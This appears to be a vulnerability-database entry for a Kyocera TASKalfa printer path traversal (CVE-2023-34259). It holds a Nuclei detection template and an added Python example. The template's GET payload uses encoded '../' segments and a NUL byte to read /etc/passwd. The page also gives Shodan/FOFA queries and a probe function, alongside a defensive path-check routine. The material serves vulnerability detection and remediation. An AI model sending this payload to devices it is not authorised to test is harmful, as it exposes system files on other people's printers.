Kyocera TASKalfa printer - Path Traversal

Nuclei template NUCLEI:CVE-2023-34259 (ProjectDiscovery, github.com)
Published: Oct 08, 2023, 08:53

Tags: kyocera, taskalfa, path traversal, vulnerability, upgrade, web applications, file system, source code, cve2023, packetstorm, seclists

CVSS3: 4.9 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: HIGH
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: NONE
  Availability Impact: NONE

AI Score: 5.3 (Confidence: High)
EPSS: 0.004 (Percentile: 73.3%)

The web interface of Kyocera TASKalfa printers has a path traversal vulnerability (CWE-22; the referenced advisory tested a TASKalfa 4053ci running firmware 2VG_S000.002.561). By manipulating the file path value in a request, an attacker can read files from the device's file system, including source code and critical system settings. Note that the CVSS vector rates the flaw as requiring high privileges (PR:H), while the Nuclei template below sends a single GET with no credentials; confirm the authentication requirement against the vendor advisory before relying on either figure when triaging.

id: CVE-2023-34259

info:
  name: Kyocera TASKalfa printer - Path Traversal
  author: gy741
  severity: medium
  description: |
    CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
    - https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
    - https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
    - https://sec-consult.com/vulnerability-lab/
    - https://seclists.org/fulldisclosure/2023/Jul/15
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2023-34259
    cwe-id: CWE-22
    epss-score: 0.00559
    epss-percentile: 0.77589
    cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kyocera
    product: d-copia253mf_plus_firmware
    shodan-query: http.favicon.hash:-50306417
    fofa-query: icon_hash=-50306417
  tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer

http:
  - method: GET
    path:
      - "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: server
        words:
          - "KM-MFP"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950
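The template above sends one GET and reports a hit only when all three matchers fire. The Python below is an added example, not the ProjectDiscovery template or any Kyocera code: it rebuilds the template's request path from its parts, applies the same three matchers to a response, and, on the defending side, shows a generic path-resolution check that rejects this payload (NUL byte and `..` climb) before any file is opened. The document root `/var/www/htdocs`, the helper names, and the sample responses used in testing are assumptions and constructed data; the printer's actual server code is not known from the page.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote
from urllib.request import Request, urlopen

# Request path copied from the template: a "wlmdeu" prefix, eleven
# URL-encoded "../" segments, the target file, then a NUL byte and a
# harmless-looking suffix. The NUL is there to truncate the path in any
# C-style string handling that runs after an extension or prefix check.
TRAVERSAL_PATH = "/wlmdeu" + "%2f%2e%2e" * 11 + "%2fetc/passwd%00index.htm"

# Matcher 1 of the template: a passwd-style root entry in the body.
PASSWD_RE = re.compile(r"root:.*:0:0")


def build_payload(depth=11, target="etc/passwd", suffix="index.htm"):
    """Rebuild the template's path from its parts; the defaults reproduce it exactly."""
    return "/wlmdeu" + "%2f%2e%2e" * depth + "%2f" + target + "%00" + suffix


def matches(status, headers, body):
    """The template's three matchers combined with matchers-condition: and.

    headers is a dict of response headers; the Server lookup is
    case-insensitive because HTTP header names are."""
    server = next((v for k, v in headers.items() if k.lower() == "server"), "")
    return status == 200 and "KM-MFP" in server and PASSWD_RE.search(body) is not None


def probe(base_url, timeout=10.0):
    """Send the template's single GET to a device you are authorised to test.

    Returns True when all three matchers hit. Network call; not run offline."""
    req = Request(base_url.rstrip("/") + TRAVERSAL_PATH, method="GET")
    with urlopen(req, timeout=timeout) as resp:
        body = resp.read(64 * 1024).decode("utf-8", "replace")
        return matches(resp.status, dict(resp.headers), body)


# --- Server side: the check that defeats this class of payload -------------

WEB_ROOT = PurePosixPath("/var/www/htdocs")  # hypothetical document root


def resolve_safely(web_root, raw_path):
    """Decode the request path, reject NUL, collapse '.'/'..' lexically and
    confine the result to web_root. Returns the resolved path or None.

    Decoding happens before the checks, so %2e%2e and %00 cannot slip past
    them the way they would past a check on the raw, still-encoded string."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        return None  # a NUL would truncate the path in C file APIs
    parts = []
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None  # would climb above the document root
            parts.pop()
        else:
            parts.append(seg)
    return web_root.joinpath(*parts)
```

`matches()` is what you would run over a captured response when validating a scanner hit by hand; `resolve_safely()` is the shape of check to look for (or add) in any embedded web server that maps request paths to files: decode once, refuse control characters, normalise lexically, then confine to the root.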
